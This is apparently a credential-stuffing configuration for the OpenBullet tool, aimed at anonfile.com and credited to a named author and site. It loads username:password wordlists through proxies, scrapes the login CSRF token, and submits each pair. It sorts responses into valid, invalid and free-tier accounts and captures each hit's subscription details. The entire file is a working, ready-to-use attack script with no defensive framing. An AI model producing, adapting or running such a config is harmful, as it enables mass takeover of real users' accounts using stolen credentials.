[SETTINGS]
{
  "Name": "Anonfile",
  "SuggestedBots": 100,
  "LastModified": "2019-03-08T17:05:07.927515+01:00",
  "AdditionalInfo": "",
  "Author": "Kirikioo#2379 | www.black-gen.pw",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_TOKEN REQUEST GET "https://anonfile.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_TOKEN PARSE "<SOURCE>" LR "=\"_token\" value=\"" "\">" Recursive=FALSE -> VAR "Token" "" "" 
#POST_LOGIN REQUEST POST "https://anonfile.com/login" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&_token=<Token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password." 
  KEYCHAIN Success OR 
    KEY "Logout" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "100 GB free." 
#CAPTURE_ABO PARSE "<SOURCE>" LR "navbar-text hidden-xs\">" ". <a href=\"https" Recursive=FALSE -> CAP "Abonnement" "" "" 
